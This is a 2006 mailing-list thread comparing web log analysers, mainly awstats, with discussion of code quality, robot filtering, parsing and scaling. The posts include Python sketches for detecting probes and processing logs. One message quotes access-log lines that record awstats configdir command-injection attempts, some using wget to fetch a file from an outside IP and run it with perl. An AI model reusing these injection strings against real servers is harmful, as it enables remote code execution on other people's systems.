|
Thread: awstats
|
|
| awstats |

|
2006-03-08 08:45:26 |
A 10Kline CGI script, with most variables global and including its own
CGI parameter parsing. Is this really the best option, or can anyone
suggest an alternative which can parse Apache logfiles and successfully
separate out robots and spiders (about 80-90% of our hits) from real
users? (The department whose server this is rejected webalizer because
they didn't like the answers it gave).
Jonathan
|
|
| awstats |

|
2006-03-08 08:51:24 |
We use analog here (http://www.analog.cx/), seems to be up to the job.
With something called report magic you can get some very nice stats out
of the box.
Personally I prefer something called webstats.pl but I can't seem to
find a link to it anymore.
|
|
| awstats |

|
2006-03-08 09:03:52 |
On Wed, Mar 08, 2006 at 08:51:24AM +0000, Peter Hickman wrote:
> We use analog here (http://www.analog.cx/), seems to be up to the job.
> With something called report magic you can get some very nice stats out
> of the box.
Isn't mint what all The Kewl Kids use these days?
http://www.haveamint.com/
I haven't, but then I amn't cool. awstats works for me,
has done for
years. I never liked analog.
m.
--
_________________________________________
/ Sharon: I was like, totally shocked \
| when I read swm's postings on the list. |
| I thought he was a quiet boy. Everyone |
\ else: *racuous laughter* /
-----------------------------------------
\
\
__
UooU\.'     `.
\__/(         )
(       )
`YY~~~~YY'
|| ||
--
Gotta have a blog. It is the law.
http://www.stray-toaster.co.uk/blog/
|
|
| awstats |

|
2006-03-08 09:25:37 |
On 08/03/06, Jonathan McKeown <jonathan hst.org.za> wrote:
> A 10Kline CGI script, with most variables global and including its own
> CGI parameter parsing. Is this really the best option, or can anyone
> suggest an alternative which can parse Apache logfiles and successfully
> separate out robots and spiders (about 80-90% of our hits) from real
> users? (The department whose server this is rejected webalizer because
> they didn't like the answers it gave).
I run it as a cronjob generating a load of static html every night..
works fine, and no dodgy CGI to worry about.
A.
|
|
| awstats |

|
2006-03-08 09:27:10 |
On Wed, 2006-03-08 at 08:45, Jonathan McKeown wrote:
> A 10Kline CGI script, with most variables global and including its own
> CGI parameter parsing.
I'd say it has a widely known and exploitable flaw:
access.log:64.49.219.174 - - [08/Mar/2005:15:51:21 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://64.51.188.10/images/sess_3539283e27d73cae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293f57;pwd;echo%20;echo| HTTP/1.1" 404 313
access.log:64.49.219.174 - - [08/Mar/2005:15:51:22 +0000] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20http://64.51.188.10/images/sess_3539283e27d73cae29fe2b80f9293f57;perl%20sess_3539283e27d73cae29fe2b80f9293f57;pwd;echo%20;echo| HTTP/1.1" 404 313
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cgi-bin/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 322
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 314
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 310
access.log:66.154.95.160 - - [15/Mar/2005:15:50:42 +0000] "GET //cp/awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 317
access.log:66.154.95.160 - - [15/Mar/2005:15:50:43 +0000] "GET //stat-cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 315
access.log:66.154.95.160 - - [15/Mar/2005:15:50:43 +0000] "GET //awstats/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 314
It's still going on.
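For anyone wanting to count these probes in their own logs, here is a minimal Python sketch. It assumes common/combined log format lines like the ones above; the names `REQUEST_RE` and `is_awstats_probe` are made up for illustration, and the check (a pipe character inside the `configdir` parameter of a request for `awstats.pl`) only covers the pattern shown in this message, not every possible attack.

```python
import re
from urllib.parse import unquote

# The quoted request field of a log line: "METHOD target PROTOCOL".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def is_awstats_probe(line):
    """Return True if the line requests awstats.pl with a '|' in configdir."""
    match = REQUEST_RE.search(line)
    if not match:
        return False
    # Decode %20 and friends so the check sees what the script would see.
    target = unquote(match.group(1))
    path, _, query = target.partition("?")
    if not path.endswith("awstats.pl"):
        return False
    return any(
        param.startswith("configdir=") and "|" in param
        for param in query.split("&")
    )


def count_probes(lines):
    """Count probe attempts in an iterable of log lines."""
    return sum(1 for line in lines if is_awstats_probe(line))
```

Feeding it an open log file, e.g. `count_probes(open("access.log"))`, gives a rough daily tally; the file name here is just the one that appears in the grep output above.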
/J\
--
This e-mail is sponsored by http://www.integration-house.com/
|
|
| awstats |

|
2006-03-08 09:47:11 |
I knew I had seen that somewhere before, my snort logs!
There were only 20 incidents yesterday.
|
|
| awstats |

|
2006-03-08 10:38:47 |
Jonathan McKeown wrote:
> A 10Kline CGI script, with most variables global and including its own
> CGI parameter parsing. Is this really the best option, or can anyone
> suggest an alternative which can parse Apache logfiles and successfully
> separate out robots and spiders (about 80-90% of our hits) from real
> users? (The department whose server this is rejected webalizer because
> they didn't like the answers it gave).
I'm kinda fond of
http://www.hping.org/visitors/
which admittedly isn't quite as featureful as most, but is simple, fast,
and seems to generate all the stats clients really *need* - plus a
pretty route-through-site diagram that fulfils the shininess quota
nicely.
--
Matt S Trout            Offering custom development, consultancy and support
Technical Director      contracts for Catalyst, DBIx::Class and BAST. Contact
Shadowcat Systems Ltd.  mst (at) shadowcatsystems.co.uk for more information
+ Help us build a better perl ORM: http://dbix-class.shadowcatsystems.co.uk/ +
|
|
| awstats |

|
2006-03-08 10:49:39 |
Jonathan McKeown writes:
> A 10Kline CGI script, with most variables global and including its own
> CGI parameter parsing.
We looked at Awstats, to the extent of actually running it for a while.
Then we stopped; we'd found plenty of reasons to avoid it:
- The known vulnerabilities in its CGI mode may have been fixed, but
  spaghetti code like that is just too hard and/or unpleasant to
  audit. I can't even say with confidence that letting Awstats parse
  your log files off-line is definitely safe.
- It can't actually parse Apache logs. Since 1.3.25, Apache has used
  a backslash escaping scheme for things like user-agents and
  referrers, so that you can actually parse log lines where the client
  sent a double-quote in one of those. Awstats doesn't care about
  that, so it misparses those lines.
- You can't just point it at a batch of log files; instead, you have
  to configure it to know where you store your log files, and the
  pattern used for the filenames. That means you can't prime it with
  the last month's (or year's) worth of logs -- you just have to run
  it for a month before it can give you any real history.
- It really really wants each vhost analysed to have exactly one log
  file. In each time period, we have one log file per public-facing
  server, each containing results for several vhosts. It wants us to
  split log files up by vhost, but then merge them by public-facing
  server, before we even have it look at them.
- It doesn't seem particularly fast. Admittedly, we generate about 4
  GiB of uncompressed logs in a day, but our home-grown stuff (which
  does actually parse, you know, Apache log files) seems rather faster
  at the basic work of parsing logs, throwing away robotic traffic,
  and aggregating data from the rest.
  It's possible it's not as bad for other people. In particular, to
  handle the vhost/server issue, we were effectively making Awstats
  run through our logs once per vhost. But I became convinced that
  the time complexity of Awstats is supra-linear in the number of
  requests anyway. As it gathered more data over the course of a
  month, it became apparent that it was soon going to need more CPU
  time than we had available. That's when we turned it off.
In general, Awstats seems to be a tool that's intended for relatively
small sites, hosted by low-end providers, with limited or no shell
access, and exactly one log file per customer. If you don't fall into
that category, I don't think Awstats is going to be particularly
convenient.
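To make the point about backslash escaping concrete, here is a small Python sketch of a combined-log-format parser whose quoted fields tolerate `\"` and `\\`. It is not the home-grown code described above; the names `QUOTED`, `COMBINED_RE`, `unescape` and `parse_combined` are invented for the example, and it assumes the standard combined format with only those two escapes needing to be undone.

```python
import re

# A quoted field: any run of non-quote, non-backslash characters,
# or a backslash followed by any single character (so \" stays inside).
QUOTED = r'"((?:[^"\\]|\\.)*)"'

COMBINED_RE = re.compile(
    r'(\S+) (\S+) (\S+) \[([^\]]+)\] '
    + QUOTED + r' (\d{3}) (\S+) ' + QUOTED + ' ' + QUOTED + r'$'
)


def unescape(field):
    """Undo the \\" and \\\\ escapes; other escapes are left untouched."""
    return re.sub(r'\\(["\\])', r'\1', field)


def parse_combined(line):
    """Parse one combined-format line into a dict, or None if it doesn't match."""
    match = COMBINED_RE.match(line.rstrip("\n"))
    if match is None:
        return None
    host, ident, user, when, request, status, size, referer, agent = match.groups()
    return {
        "host": host,
        "time": when,
        "request": unescape(request),
        "status": int(status),
        "size": size,  # kept as text: Apache logs "-" when no body was sent
        "referer": unescape(referer),
        "user_agent": unescape(agent),
    }
```

A parser that matches quoted fields with something like `"([^"]*)"` stops at the first embedded quote, which is the kind of misparse the second bullet describes.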
> Is this really the best option, or can anyone suggest an alternative
> which can parse Apache logfiles and successfully separate out robots
> and spiders (about 80-90% of our hits) from real users?
We wrote our own, sad to say. We use the ABCE robot list; I've looked
at CPANning our code, but most of it's the data file, and I think ABCE
own the copyright on the list.
Note also that having home-grown log analysis stuff does mean that we
can do things that a general-purpose tool couldn't. For example, our
software can examine popularity of site sections, rather than just of
URLs.
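As a rough illustration of counting by site section rather than by URL, here is a Python sketch. Everything in it is an assumption for the example: `ROBOT_MARKERS` is a tiny placeholder and not the ABCE list, a "section" is taken to be the first directory of the path, and the input is assumed to be already-parsed `(path, user_agent)` pairs.

```python
from collections import Counter

# Placeholder substrings only; a real robot list is far longer.
ROBOT_MARKERS = ("bot", "crawler", "spider", "slurp")


def is_robot(user_agent):
    """Crude check: does the user-agent contain a known robot marker?"""
    agent = user_agent.lower()
    return any(marker in agent for marker in ROBOT_MARKERS)


def section_of(path):
    """Map a request path to its top-level section, e.g. /news/a.html -> /news."""
    # Drop the query string, then the file name after the last slash.
    directory = path.split("?", 1)[0].rsplit("/", 1)[0]
    first = directory.strip("/").split("/", 1)[0]
    return "/" + first


def section_hits(requests):
    """Count non-robot hits per section from (path, user_agent) pairs."""
    counts = Counter()
    for path, user_agent in requests:
        if not is_robot(user_agent):
            counts[section_of(path)] += 1
    return counts
```

Swapping `section_of` for a site-specific mapping (say, a table from URL prefixes to section names) is the kind of customisation a general-purpose tool would not offer.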
--
Aaron Crane
|
|
| awstats |

|
2006-03-08 11:57:37 |
On Wed, 8 Mar 2006, Aaron Crane wrote:
> We looked at Awstats, to the extent of actually running it for a while.
> Then we stopped; we'd found plenty of reasons to avoid it:
>
> - The known vulnerabilities in its CGI mode may have been fixed, but
>   spaghetti code like that is just too hard and/or unpleasant to
>   audit. I can't even say with confidence that letting Awstats parse
>   your log files off-line is definitely safe.
Agreed. Every time I look at the code I want to scream. It's just crying
out to be refactored into decent modules.
> - It can't actually parse Apache logs. Since 1.3.25, Apache has used
>   a backslash escaping scheme for things like user-agents and
>   referrers, so that you can actually parse log lines where the client
>   sent a double-quote in one of those. Awstats doesn't care about
>   that, so it misparses those lines.
I've not found this to be a problem with 6.4 but perhaps I'm not looking
in the right place. Which version did you try?
> - You can't just point it at a batch of log files; instead, you have
>   to configure it to know where you store your log files, and the
>   pattern used for the filenames. That means you can't prime it with
>   the last month's (or year's) worth of logs -- you just have to run
>   it for a month before it can give you any real history.
A simple shell script allows you to iterate over as many logs as you
want. We rotate logs weekly and have had to rerun a whole year's worth
before now. Wildcards would be nice though.
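The loop described here can be sketched in Python as follows. This is a guess at the shape of such a script, not the one actually used: `update_commands` and `replay` are invented names, the `-config`, `-update` and `-LogFile` switches are quoted from memory of the awstats command line and should be checked against your version, and the file names are assumed to sort chronologically (for example a date suffix).

```python
import subprocess


def update_commands(log_paths, config, awstats="awstats.pl"):
    """Build one awstats update command per log file, oldest name first."""
    return [
        ["perl", awstats, f"-config={config}", "-update", f"-LogFile={path}"]
        for path in sorted(log_paths)  # assumes names sort in date order
    ]


def replay(log_paths, config, dry_run=True):
    """Print the commands, or run them in order when dry_run is False."""
    for command in update_commands(log_paths, config):
        if dry_run:
            print(" ".join(command))
        else:
            # Stop at the first failure so later logs are not fed out of order.
            subprocess.run(command, check=True)
```

Called as `replay(glob.glob("/var/log/apache/access.log.*"), "mysite")` (path and config name are placeholders, and `glob` needs importing), it prints what it would run; processing oldest-first matters because the tool expects records in time order.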
> - It really really wants each vhost analysed to have exactly one log
>   file. In each time period, we have one log file per public-facing
>   server, each containing results for several vhosts. It wants us to
>   split log files up by vhost, but then merge them by public-facing
>   server, before we even have it look at them.
Kinda. You do need to merge the logs into timestamp order but you can
look for specific vhosts with the %v modifier in the log format.
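Merging per-server logs into timestamp order can be sketched with Python's `heapq.merge`. The assumptions are that each input is already in time order, that timestamps use the usual `[08/Mar/2006:10:00:00 +0000]` form, and, for the filter, that `%v` is logged as the first field of each line. The names `timestamp`, `merge_logs` and `for_vhost` are invented for the example.

```python
import heapq
import re
from datetime import datetime

# First bracketed field on the line, e.g. [08/Mar/2006:10:00:00 +0000].
STAMP_RE = re.compile(r'\[([^\]]+)\]')


def timestamp(line):
    """Extract the request time from a log line as an aware datetime."""
    stamp = STAMP_RE.search(line).group(1)
    return datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")


def merge_logs(*streams):
    """Lazily merge already-sorted log streams into one time-ordered stream."""
    return heapq.merge(*streams, key=timestamp)


def for_vhost(lines, vhost):
    """Keep only lines whose first field (assumed to be %v) is the given vhost."""
    return (line for line in lines if line.split(" ", 1)[0] == vhost)
```

Because the merge is lazy, something like `for_vhost(merge_logs(open(a), open(b)), "www.example.org")` streams through large files without loading them into memory; the host name is a placeholder.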
> - It doesn't seem particularly fast. Admittedly, we generate about 4
>   GiB of uncompressed logs in a day, but our home-grown stuff (which
>   does actually parse, you know, Apache log files) seems rather faster
>   at the basic work of parsing logs, throwing away robotic traffic,
>   and aggregating data from the rest.
It's not very fast and admits as much but it's fast enough on our logs
that are about 450Mb/week.
>   It's possible it's not as bad for other people. In particular, to
>   handle the vhost/server issue, we were effectively making Awstats
>   run through our logs once per vhost. But I became convinced that
>   the time complexity of Awstats is supra-linear in the number of
>   requests anyway. As it gathered more data over the course of a
>   month, it became apparent that it was soon going to need more CPU
>   time than we had available. That's when we turned it off.
>
> In general, Awstats seems to be a tool that's intended for relatively
> small sites, hosted by low-end providers, with limited or no shell
> access, and exactly one log file per customer. If you don't fall into
> that category, I don't think Awstats is going to be particularly
> convenient.
I would agree with that. It's definitely not up to the job of managing
large sites.
> > Is this really the best option, or can anyone suggest an alternative
> > which can parse Apache logfiles and successfully separate out robots
> > and spiders (about 80-90% of our hits) from real users?
>
> We wrote our own, sad to say. We use the ABCE robot list; I've looked
> at CPANning our code, but most of it's the data file, and I think ABCE
> own the copyright on the list.
We're tending towards doing this too. I just looked at webtrends and
it's almost $10,000 for the licence we need.
> Note also that having home-grown log analysis stuff does mean that we
> can do things that a general-purpose tool couldn't. For example, our
> software can examine popularity of site sections, rather than just of
> URLs.
This is the problem we're now experiencing with awstats. We need
granularity that awstats doesn't have.
Simon.
--
"You've really gotta know where your towel is."
|
|
| awstats |

|
2006-03-08 14:36:57 |
Matt S Trout wrote:
> Jonathan McKeown wrote:
>> A 10Kline CGI script, with most variables global and including its own
>> CGI parameter parsing. Is this really the best option, or can anyone
>> suggest an alternative which can parse Apache logfiles and
>> successfully separate out robots and spiders (about 80-90% of our
>> hits) from real users? (The department whose server this is rejected
>> webalizer because they didn't like the answers it gave).
>
> I'm kinda fond of
>
> http://www.hping.org/visitors/
>
> which admittedly isn't quite as featureful as most, but is simple, fast,
> and seems to generate all the stats clients really *need* - plus a
> pretty route-through-site diagram that fulfils the shininess quota nicely.
mmm.... smooth.
Thanks for that. I now have a reason to ditch webalizer.
David
--
"It's overkill of course, but you can never have too much overkill."
|
|
|
|